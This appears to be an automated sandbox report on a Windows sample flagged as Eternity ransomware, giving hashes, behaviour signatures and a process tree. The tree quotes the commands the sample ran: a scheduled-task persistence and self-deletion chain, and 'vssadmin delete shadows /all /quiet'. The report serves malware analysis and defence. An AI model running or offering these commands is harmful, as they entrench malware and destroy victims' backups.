Analysis

  • max time kernel
    150s
  • max time network
    39s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    16-05-2023 13:52

General

  • Target

    file.exe

  • Size

    113KB

  • MD5

    2ae68a2dba8b4d6279d32fb7d70955fa

  • SHA1

    8a575e9c5c64ff797b9a7dca776a816e444f7485

  • SHA256

    fdb6a85d8a54244ce523286412d18ddefbf2b59e54f59576311d9f54e68a398f

  • SHA512

    df0358ec74e4e4d6367b351318277e5e932b6d1a6b4797ac1fcb6fc11374f80c50a62ff79f24bc0846b7623e27ffecdd65e41ca9da52db952d7cb6474d275b44

  • SSDEEP

    3072:06rBzfCEUmPVES5ca+Rop3rMFnobA+sMDJax2XZZji:0OBzfC18ES5dN3rMFnobW12XZZ

Malware Config

Signatures

  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\file.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\file.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"
      2⤵
      • Deletes itself
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:584
      • C:\Windows\SysWOW64\chcp.com
        chcp 65001
        3⤵
          PID:588
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:1156
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\file.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:1820
        • C:\Users\Admin\AppData\Local\ServiceHub\file.exe
          "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"
          3⤵
          • Modifies extensions of user files
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1536
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C chcp 65001 && vssadmin delete shadows /all /quiet
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:268
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
                PID:1292
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin delete shadows /all /quiet
                5⤵
                • Interacts with shadow copies
                PID:864
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1576
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {D9269005-2A71-4323-A8E1-38D9038420D5} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Users\Admin\AppData\Local\ServiceHub\file.exe
          C:\Users\Admin\AppData\Local\ServiceHub\file.exe
          2⤵
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1596
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C chcp 65001 && vssadmin delete shadows /all /quiet
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:112
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              4⤵
                PID:692
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin delete shadows /all /quiet
                4⤵
                • Interacts with shadow copies
                PID:1748

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\ServiceHub\file.exe

          Filesize

          113KB

          MD5

          2ae68a2dba8b4d6279d32fb7d70955fa

          SHA1

          8a575e9c5c64ff797b9a7dca776a816e444f7485

          SHA256

          fdb6a85d8a54244ce523286412d18ddefbf2b59e54f59576311d9f54e68a398f

          SHA512

          df0358ec74e4e4d6367b351318277e5e932b6d1a6b4797ac1fcb6fc11374f80c50a62ff79f24bc0846b7623e27ffecdd65e41ca9da52db952d7cb6474d275b44

        • C:\Users\Admin\AppData\Local\ServiceHub\file.exe

          Filesize

          113KB

          MD5

          2ae68a2dba8b4d6279d32fb7d70955fa

          SHA1

          8a575e9c5c64ff797b9a7dca776a816e444f7485

          SHA256

          fdb6a85d8a54244ce523286412d18ddefbf2b59e54f59576311d9f54e68a398f

          SHA512

          df0358ec74e4e4d6367b351318277e5e932b6d1a6b4797ac1fcb6fc11374f80c50a62ff79f24bc0846b7623e27ffecdd65e41ca9da52db952d7cb6474d275b44

        • C:\Users\Admin\AppData\Local\ServiceHub\file.exe

          Filesize

          113KB

          MD5

          2ae68a2dba8b4d6279d32fb7d70955fa

          SHA1

          8a575e9c5c64ff797b9a7dca776a816e444f7485

          SHA256

          fdb6a85d8a54244ce523286412d18ddefbf2b59e54f59576311d9f54e68a398f

          SHA512

          df0358ec74e4e4d6367b351318277e5e932b6d1a6b4797ac1fcb6fc11374f80c50a62ff79f24bc0846b7623e27ffecdd65e41ca9da52db952d7cb6474d275b44

        • \Users\Admin\AppData\Local\ServiceHub\file.exe

          Filesize

          113KB

          MD5

          2ae68a2dba8b4d6279d32fb7d70955fa

          SHA1

          8a575e9c5c64ff797b9a7dca776a816e444f7485

          SHA256

          fdb6a85d8a54244ce523286412d18ddefbf2b59e54f59576311d9f54e68a398f

          SHA512

          df0358ec74e4e4d6367b351318277e5e932b6d1a6b4797ac1fcb6fc11374f80c50a62ff79f24bc0846b7623e27ffecdd65e41ca9da52db952d7cb6474d275b44

        • memory/1104-54-0x0000000000DB0000-0x0000000000DD2000-memory.dmp

          Filesize

          136KB

        • memory/1536-90-0x0000000005AF0000-0x0000000005B30000-memory.dmp

          Filesize

          256KB

        • memory/1536-88-0x0000000005AF0000-0x0000000005B30000-memory.dmp

          Filesize

          256KB

        • memory/1536-87-0x0000000005AF0000-0x0000000005B30000-memory.dmp

          Filesize

          256KB

        • memory/1536-60-0x0000000000350000-0x0000000000372000-memory.dmp

          Filesize

          136KB

        • memory/1536-93-0x0000000005AF0000-0x0000000005B30000-memory.dmp

          Filesize

          256KB

        • memory/1536-92-0x0000000005AF0000-0x0000000005B30000-memory.dmp

          Filesize

          256KB

        • memory/1596-91-0x0000000005D30000-0x0000000005D70000-memory.dmp

          Filesize

          256KB

        • memory/1596-94-0x0000000005D30000-0x0000000005D70000-memory.dmp

          Filesize

          256KB

        • memory/1596-95-0x0000000005D30000-0x0000000005D70000-memory.dmp

          Filesize

          256KB

        • memory/1596-97-0x0000000005D30000-0x0000000005D70000-memory.dmp

          Filesize

          256KB

        • memory/1596-98-0x0000000005D30000-0x0000000005D70000-memory.dmp

          Filesize

          256KB